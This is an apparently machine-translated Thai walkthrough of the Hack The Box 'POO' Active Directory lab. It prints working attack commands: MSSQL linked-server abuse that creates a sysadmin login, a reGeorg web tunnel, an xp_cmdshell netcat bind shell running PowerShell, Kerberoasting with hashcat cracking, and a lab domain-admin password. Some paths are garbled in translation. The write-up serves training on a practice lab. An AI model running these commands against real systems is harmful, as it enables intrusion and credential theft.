HackTheBoxendเกม ทางเดินของห้องปฏิบัติการปฏิบัติการรุกอย่างมืออาชีพ Pentest Active Directory

ในบทความนี้เราจะวิเคราะห์เนื้อเรื่องไม่ใช่แค่เครื่องจักร แต่เป็นห้องปฏิบัติการขนาดเล็กทั้งหมดจากไซต์ แฮ็คเดอะบ็อกซ์.

ตามที่ระบุไว้ในคำอธิบาย POO ได้รับการออกแบบมาเพื่อทดสอบทักษะในทุกขั้นตอนของการโจมตีในสภาพแวดล้อม Active Directory ขนาดเล็ก เป้าหมายคือการประนีประนอมโฮสต์ที่มีอยู่ เพิ่มระดับสิทธิ์ และในที่สุดก็ประนีประนอมทั้งโดเมนด้วยการรวบรวม 5 แฟล็กในกระบวนการ

การเชื่อมต่อกับห้องปฏิบัติการผ่าน VPN ขอแนะนำว่าอย่าเชื่อมต่อจากคอมพิวเตอร์ที่ใช้งานได้หรือจากโฮสต์ที่มีข้อมูลสำคัญสำหรับคุณ เนื่องจากคุณเข้าสู่เครือข่ายส่วนตัวกับคนที่รู้บางอย่างเกี่ยวกับความปลอดภัยของข้อมูล 🙂

ข้อมูลองค์กร
เพื่อให้คุณค้นหาข้อมูลเกี่ยวกับบทความ ซอฟต์แวร์ และข้อมูลอื่น ๆ ใหม่ ฉันจึงสร้างขึ้น ช่องในโทรเลข и กลุ่มเพื่อหารือเกี่ยวกับปัญหาใด ๆ ในพื้นที่ของ IIKB คำขอส่วนตัว คำถาม ข้อเสนอแนะ และข้อเสนอแนะของคุณ ฉันจะดูและตอบกลับทุกคน.

ข้อมูลทั้งหมดจัดทำขึ้นเพื่อการศึกษาเท่านั้น ผู้เขียนเอกสารนี้ไม่รับผิดชอบต่อความเสียหายใด ๆ ที่เกิดกับบุคคลใดอันเป็นผลมาจากการใช้ความรู้และวิธีการที่ได้รับจากการศึกษาเอกสารนี้

แนะนำ

endgame นี้ประกอบด้วยสองเครื่องและมี 5 ธง

คำอธิบายและที่อยู่ของโฮสต์ที่มีอยู่จะได้รับด้วย

มาเริ่มกันเลย!

ธงรีคอน

เครื่องนี้มีที่อยู่ IP 10.13.38.11 ซึ่งฉันเพิ่มใน /etc/hosts
10.13.38.11 poo.htb

ขั้นตอนแรกคือการสแกนพอร์ตที่เปิดอยู่ เนื่องจากการสแกนพอร์ตทั้งหมดด้วย nmap ใช้เวลานาน ฉันจะทำการสแกนด้วย Masscan ก่อน เราสแกนพอร์ต TCP และ UDP ทั้งหมดจากอินเทอร์เฟซ tun0 ที่ 500pps

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

ตอนนี้ เพื่อรับข้อมูลโดยละเอียดเพิ่มเติมเกี่ยวกับบริการที่ทำงานบนพอร์ต เรามาสแกนด้วยตัวเลือก -A

nmap -A poo.htb -p80,1433

ดังนั้นเราจึงมีบริการ IIS และ MSSQL ในกรณีนี้ เราจะค้นหาชื่อ DNS ที่แท้จริงของโดเมนและคอมพิวเตอร์ บนเว็บเซิร์ฟเวอร์ เราได้รับการต้อนรับจากโฮมเพจ IIS

มาวนซ้ำไดเร็กทอรีกัน ฉันใช้ gobuster สำหรับสิ่งนี้ ในพารามิเตอร์เราระบุจำนวนสตรีม 128 (-t), URL (-u), พจนานุกรม (-w) และส่วนขยายที่เราสนใจ (-x)

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

ดังนั้นเราจึงมีการตรวจสอบสิทธิ์ HTTP สำหรับไดเร็กทอรี /admin รวมถึงไฟล์พื้นที่เก็บข้อมูลบริการเดสก์ท็อป .DS_Store ที่พร้อมใช้งาน .DS_Store คือไฟล์ที่เก็บการตั้งค่าของผู้ใช้สำหรับโฟลเดอร์ เช่น รายการไฟล์ ตำแหน่งไอคอน ภาพพื้นหลังที่เลือก ไฟล์ดังกล่าวอาจไปอยู่ในไดเร็กทอรีเว็บเซิร์ฟเวอร์ของนักพัฒนาเว็บ ดังนั้นเราจึงได้รับข้อมูลเกี่ยวกับเนื้อหาของไดเร็กทอรี สำหรับสิ่งนี้คุณสามารถใช้ โปรแกรมรวบรวมข้อมูล DS_Store.

python3 dsstore_crawler.py -i http://poo.htb/

เราได้รับเนื้อหาของไดเร็กทอรี สิ่งที่น่าสนใจที่สุดคือไดเร็กทอรี /dev ซึ่งเราสามารถดูซอร์สและไฟล์ db ในสองสาขาได้ แต่เราสามารถใช้อักขระ 6 ตัวแรกของชื่อไฟล์และไดเร็กทอรีได้ หากบริการมีความเสี่ยงต่อ IIS ShortName คุณสามารถตรวจสอบช่องโหว่นี้ได้โดยใช้ เครื่องสแกนชื่อย่อ IIS.

และเราพบไฟล์ข้อความหนึ่งไฟล์ที่ขึ้นต้นด้วย "poo_co" โดยไม่รู้ว่าต้องทำอย่างไรต่อไป ฉันเพียงเลือกจากพจนานุกรมของไดเร็กทอรีของคำทั้งหมดที่ขึ้นต้นด้วย "co"

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

และวนซ้ำด้วย wfuzz

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

และค้นหาคำที่เหมาะสม! เราดูที่ไฟล์นี้ บันทึกข้อมูลประจำตัว (ตัดสินโดยพารามิเตอร์ DBNAME ซึ่งมาจาก MSSQL)

เรามอบธงและเราก้าวหน้า 20%

หึ ฟันธง

เราเชื่อมต่อกับ MSSQL ฉันใช้ DBeaver

เราไม่พบสิ่งที่น่าสนใจในฐานข้อมูลนี้ ลองสร้างตัวแก้ไข SQL และตรวจสอบว่าผู้ใช้คืออะไร

SELECT name FROM master..syslogins;

เรามีผู้ใช้สองคน มาเช็คสิทธิพิเศษกันเถอะ

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

ดังนั้นจึงไม่มีสิทธิพิเศษใดๆ มาดูเซิร์ฟเวอร์ที่เชื่อมโยงกัน ฉันเขียนเกี่ยวกับเทคนิคนี้อย่างละเอียด ที่นี่.

SELECT * FROM master..sysservers;

ดังนั้นเราจึงพบ SQL Server อื่น ตรวจสอบการทำงานของคำสั่งบนเซิร์ฟเวอร์นี้โดยใช้ openquery()

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

และเรายังสามารถสร้าง Query Tree ได้อีกด้วย

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

ความจริงก็คือเมื่อเราส่งคำขอไปยังเซิร์ฟเวอร์ที่เชื่อมโยง คำขอนั้นจะถูกดำเนินการในบริบทของผู้ใช้รายอื่น! มาดูกันว่าเรากำลังเรียกใช้บริบทผู้ใช้ใดบนเซิร์ฟเวอร์ที่เชื่อมโยง

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

และตอนนี้เรามาดูกันว่าคำขอจากเซิร์ฟเวอร์ที่เชื่อมโยงไปยังของเรานั้นถูกดำเนินการในบริบทใด!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

ดังนั้นจึงเป็นบริบท DBO ที่ต้องมีสิทธิ์ทั้งหมด ตรวจสอบสิทธิ์ในกรณีที่มีการร้องขอจากเซิร์ฟเวอร์ที่เชื่อมโยง

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

อย่างที่คุณเห็น เรามีสิทธิ์ทั้งหมด! มาสร้างผู้ดูแลระบบของเราแบบนี้ แต่พวกเขาไม่ให้ผ่าน openquery มาทำผ่าน EXECUTE AT กันเถอะ

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

และตอนนี้เราเชื่อมต่อกับข้อมูลรับรองของผู้ใช้ใหม่ สังเกตฐานข้อมูลแฟล็กใหม่

เรามอบธงนี้และก้าวต่อไป

ธงถอยหลัง

มารับเชลล์โดยใช้ MSSQL ฉันใช้ mssqlclient จากแพ็คเกจ Impactet

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

เราต้องได้รับรหัสผ่านและสิ่งแรกที่เราพบแล้วคือไซต์ ดังนั้นเราจึงต้องการการกำหนดค่าเว็บเซิร์ฟเวอร์ (เป็นไปไม่ได้ที่จะโยนเชลล์ที่สะดวก เห็นได้ชัดว่าไฟร์วอลล์กำลังทำงานอยู่)

แต่การเข้าถึงถูกปฏิเสธ แม้ว่าเราจะสามารถอ่านไฟล์จาก MSSQL ได้ แต่เราก็ต้องรู้ว่ามีการกำหนดค่าภาษาโปรแกรมอะไร และในไดเร็กทอรี MSSQL เราพบว่ามี Python

จากนั้นไม่มีปัญหาในการอ่านไฟล์ web.config

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

เมื่อพบข้อมูลรับรองแล้ว ให้ไปที่ /admin และรับธง

ตั้งหลักปักธง

ในความเป็นจริง มีความไม่สะดวกบางประการจากการใช้ไฟร์วอลล์ แต่เมื่อดูผ่านการตั้งค่าเครือข่าย เราสังเกตเห็นว่ามีการใช้โปรโตคอล IPv6 ด้วย!

เพิ่มที่อยู่นี้ใน /etc/hosts
dead:babe::1001 poo6.htb
ลองสแกนโฮสต์อีกครั้ง แต่คราวนี้ผ่าน IPv6

และบริการ WinRM พร้อมใช้งานบน IPv6 มาเชื่อมต่อกับข้อมูลรับรองที่พบ

มีธงอยู่บนโต๊ะ มอบให้

P00ned แฟล็ก

หลังจากตระเวนอยู่กับเจ้าบ้าน ถั่ววินพี เราไม่พบอะไรพิเศษ จากนั้นจึงตัดสินใจค้นหาข้อมูลประจำตัวอีกครั้ง (ฉันเขียนในหัวข้อนี้ด้วย บทความ). แต่ฉันไม่สามารถรับ SPN ทั้งหมดจากระบบผ่าน WinRM

setspn.exe -T intranet.poo -Q */*

ลองรันคำสั่งผ่าน MSSQL

ด้วยวิธีนี้ เราได้รับ SPN ของผู้ใช้ p00_hr และ p00_adm ซึ่งหมายความว่าพวกเขาเสี่ยงต่อการถูกโจมตี เช่น Kerberoasting ในระยะสั้น เราสามารถรับแฮชของรหัสผ่านได้

ก่อนอื่นคุณต้องได้รับเชลล์ที่เสถียรในนามของผู้ใช้ MSSQL แต่เนื่องจากเราเข้าถึงได้จำกัด เราจึงเชื่อมต่อกับโฮสต์ผ่านพอร์ต 80 และ 1433 เท่านั้น แต่สามารถขุดอุโมงค์ผ่านพอร์ต 80 ได้! สำหรับสิ่งนี้เราจะใช้ การสมัครครั้งต่อไป. มาอัปโหลดไฟล์ tunnel.aspx ไปยังโฮมไดเร็กทอรีของเว็บเซิร์ฟเวอร์ - C: inetpubwwwroot

แต่เมื่อเราพยายามเข้าถึงเราได้รับข้อผิดพลาด 404 ซึ่งหมายความว่าไฟล์ *.aspx จะไม่ถูกเรียกใช้งาน หากต้องการเรียกใช้ไฟล์ที่มีนามสกุลเหล่านี้ ให้ติดตั้ง ASP.NET 4.5 ดังนี้

dism /online /enable-feature /all /featurename:IIS-ASPNET45

และตอนนี้เมื่อเข้าไปที่ tunnel.aspx เราก็ได้คำตอบว่าทุกอย่างพร้อมแล้ว

เรามาเริ่มส่วนไคลเอนต์ของแอปพลิเคชันซึ่งจะส่งต่อทราฟฟิก เราจะส่งต่อการรับส่งข้อมูลทั้งหมดจากพอร์ต 5432 ไปยังเซิร์ฟเวอร์

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

และเราใช้พร็อกซีเชนเพื่อส่งทราฟฟิกของแอปพลิเคชันใดๆ ผ่านพร็อกซีของเรา มาเพิ่มพร็อกซีนี้ในไฟล์คอนฟิกูเรชัน /etc/proxychains.conf

ตอนนี้เรามาอัปโหลดโปรแกรมไปยังเซิร์ฟเวอร์ netcatซึ่งเราจะสร้างการผูกเชลล์ที่เสถียรและสคริปต์ เรียกใช้ Kerberoastซึ่งเราจะทำการโจมตี Kerberoasting

ตอนนี้ผ่าน MSSQL เราเปิดตัวฟัง

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

และเราเชื่อมต่อผ่านพร็อกซีของเรา

proxychains rlwrap nc poo.htb 4321

และมารับแฮชกัน

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

ถัดไป คุณต้องวนซ้ำแฮชเหล่านี้ เนื่องจาก rockyou ไม่มีพจนานุกรมข้อมูลรหัสผ่าน ฉันจึงใช้พจนานุกรมรหัสผ่านทั้งหมดที่มีให้ใน Seclists สำหรับการแจงนับเราใช้ hashcat

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

และเราพบรหัสผ่านทั้งสองอัน อันแรกอยู่ในพจนานุกรม dutch_passwordlist.txt และอันที่สองอยู่ใน Keyboard-Combinations.txt

เรามีผู้ใช้สามคน ไปที่ตัวควบคุมโดเมน ลองหาที่อยู่ของเขาก่อน

เยี่ยมมาก เราได้เรียนรู้ที่อยู่ IP ของตัวควบคุมโดเมนแล้ว มาดูกันว่าผู้ใช้ทั้งหมดของโดเมนรวมถึงใครเป็นผู้ดูแลระบบ เพื่อดาวน์โหลดสคริปต์เพื่อรับข้อมูล PowerView.ps1 จากนั้นเราจะเชื่อมต่อโดยใช้ evil-winrm โดยระบุไดเร็กทอรีด้วยสคริปต์ในพารามิเตอร์ -s จากนั้นเพียงโหลดสคริปต์ PowerView

ตอนนี้เราสามารถเข้าถึงฟังก์ชั่นทั้งหมดได้แล้ว ผู้ใช้ p00_adm ดูเหมือนผู้ใช้ที่มีสิทธิพิเศษ ดังนั้นเราจะทำงานในบริบทของมัน มาสร้างวัตถุ PSCredential สำหรับผู้ใช้นี้กันเถอะ

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ตอนนี้คำสั่ง Powershell ทั้งหมดที่เราระบุ Creds จะถูกดำเนินการในนามของ p00_adm แสดงรายชื่อผู้ใช้และแอตทริบิวต์ AdminCount

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

ดังนั้น ผู้ใช้ของเราจึงได้รับสิทธิพิเศษจริงๆ มาดูกันว่าเขาจัดอยู่ในกลุ่มไหน

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

ในที่สุดเราก็ยืนยันว่าผู้ใช้เป็นผู้ดูแลโดเมน สิ่งนี้ให้สิทธิ์ในการเข้าสู่ระบบตัวควบคุมโดเมนจากระยะไกล ลองเข้าสู่ระบบด้วย WinRM โดยใช้อุโมงค์ของเรา ฉันสับสนกับข้อผิดพลาดที่ออกโดย reGeorg เมื่อใช้ evil-winrm

จากนั้นเราก็ใช้อันอื่นที่ง่ายกว่า ต้นฉบับ เพื่อเชื่อมต่อกับ WinRM เปิดและเปลี่ยนพารามิเตอร์การเชื่อมต่อ

เราพยายามเชื่อมต่อและเราอยู่ในระบบ

แต่ไม่มีธง จากนั้นดูที่ผู้ใช้และตรวจสอบเดสก์ท็อป

ที่ mr3ks เราพบธงและห้องปฏิบัติการเสร็จสมบูรณ์ 100%

นั่นคือทั้งหมด ให้แสดงความคิดเห็นว่าคุณได้เรียนรู้สิ่งใหม่จากบทความนี้หรือไม่ และเป็นประโยชน์กับคุณหรือไม่

คุณสามารถเข้าร่วมกับเราได้ที่ Telegram. คุณสามารถค้นหาเนื้อหาที่น่าสนใจ หลักสูตรที่ผสานรวม และซอฟต์แวร์ได้ที่นี่ มารวมตัวกันเป็นชุมชนที่มีผู้ที่เข้าใจด้านไอทีหลายๆ ด้าน แล้วเราจะสามารถช่วยเหลือซึ่งกันและกันในประเด็นด้านไอทีและความปลอดภัยของข้อมูลได้เสมอ

ที่มา: will.com